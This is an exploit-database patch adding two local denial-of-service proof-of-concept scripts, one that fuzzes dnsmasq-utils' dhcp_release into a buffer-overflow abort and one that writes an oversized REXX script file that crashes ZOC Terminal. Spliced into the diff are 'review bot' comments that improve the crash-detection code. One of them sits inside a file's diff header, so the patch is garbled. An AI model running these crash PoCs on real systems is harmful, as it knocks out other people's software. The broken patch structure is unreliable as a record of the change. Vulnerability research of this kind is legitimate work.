From 36c65f8dd4df875987b37b467d7a03df7dd163ba Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 8 Apr 2020 05:01:50 +0000
Subject: [PATCH] DB: 2020-04-08

2 changes to exploits/shellcodes

dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
---
 exploits/linux/dos/48301.py | 38 +++++++++++++++++++++++++++++++++++
 exploits/windows/dos/48302.py | 21 +++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 61 insertions(+)
 create mode 100755 exploits/linux/dos/48301.py
 create mode 100755 exploits/windows/dos/48302.py

diff --git a/exploits/linux/dos/48301.py b/exploits/linux/dos/48301.py
new file mode 100755
index 000000000..aa6146124
--- /dev/null
+++ b/exploits/linux/dos/48301.py
@@ -0,0 +1,38 @@
+# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
+# Date: 2020-04-06
+# Exploit Author: Josue Encinar
+# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
+# Version: 2.79
+# Tested on: Ubuntu 18.04
+
+
+from subprocess import Popen, PIPE
+
+data = ""
+bof = False
+for i in range (1, 200):
+    A = "A"*i
+    data = f"dhcp_release {A} 1 1"
+    try:
+        result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
+        error = result.stderr.read().decode()
+        if "Aborted (core dumped)" in error:
+            print("[+] Buffer Overflow detected!")
+            print(f"[*] Offset: {i}")
+            bof = True
+            break
+    except Exception as e:
+        print(f"[-] {e}")
+
+if not bof:
+    print("[-] No buffer overflow...")
+
+
+## Check line 273 in dhcp_release.c
+### strcpy(ifr.ifr_name, argv[1]);
+#
+## PoC:
+# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py
+# *** buffer overflow detected ***: dhcp_release terminated
+# [+] Buffer Overflow detected!
+# [*] Offset: 16
\ No newline at end of file
diff --git a/exploits/windows/dos/48302.py b/exploits/windows/dos/48302.py
new file mode 100755
index 000000000..1f658e2bd
--- /dev/null
+++ b/exploits/windows/dos/48302.py
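Review bot: The detection at `if "Aborted (core dumped)" in error:` keys on a message printed by the shell that `shell=True` spawns, not by dhcp_release, and its exact wording depends on which /bin/sh is installed and on whether a core file was actually written (ulimit -c), so on another host the script can print `[-] No buffer overflow...` even though the FORTIFY abort fired; the PoC transcript at the bottom shows the real signal is glibc's `*** buffer overflow detected ***` followed by SIGABRT. Checking the exit status is independent of shell and core settings: run the argv list without a shell and test for SIGABRT, which also drops the needless `shell=True` and reaps the child (the Popen objects are never waited on). With `import signal, subprocess` in place of the `from subprocess import Popen, PIPE` line the loop becomes the fragment below; the unused `data = ""` initialisation can go. The trailing comment would be clearer if it said outright that the offset it reports (16) is consistent with the IFNAMSIZ-sized `ifr_name` target of the quoted strcpy and that what is detected is a FORTIFY abort — a local crash of the utility, not demonstrated control of execution.
```python
bof = False
for i in range (1, 200):
    A = "A"*i
    # No shell: argv goes straight to the binary, and a FORTIFY abort shows up
    # as SIGABRT in the return code whatever /bin/sh or ulimit -c is in use.
    try:
        result = subprocess.run(["dhcp_release", A, "1", "1"],
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    except FileNotFoundError as e:  # dnsmasq-utils not installed
        print(f"[-] {e}")
        break
    if result.returncode == -signal.SIGABRT:
        print("[+] Buffer Overflow detected!")
        print(f"[*] Offset: {i}")
        bof = True
        break
# … unchanged: final report and trailing comments …
```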
@@ -0,0 +1,21 @@
+# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
+# 2.- Open ZOC Terminal
+# 3.- Select Script > Start REXX Script...
+# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
+# 5.- Crashed
+
+cod = "\x41" * 20000
+
+f = open('ZOC_7.25.5_Script.zrx', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ebfba676e..0e71d3f74 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6700,6 +6700,8 @@ id,file,description,date,author,type,platform,port
 48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
+48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
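Review bot: The reproduction steps in the header contradict the code: step 1 says the script creates `"exp.zrx"`, while `open('ZOC_7.25.5_Script.zrx', 'w')` and step 4 both name `ZOC_7.25.5_Script.zrx`, so a reader following step 1 looks for a file that is never written; change it to `# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "ZOC_7.25.5_Script.zrx"`. The handle is also closed by hand; `with open('ZOC_7.25.5_Script.zrx', 'w') as f: f.write(cod)` releases it even if the write raises. The `Vulnerability Type: Local` line is accurate and deserves one more clause: the crash requires the victim to open the generated script themselves via Script > Start REXX Script, and nothing in this PoC shows the 20000-byte input steering execution, so it is a crash-only finding until a debugger trace says otherwise.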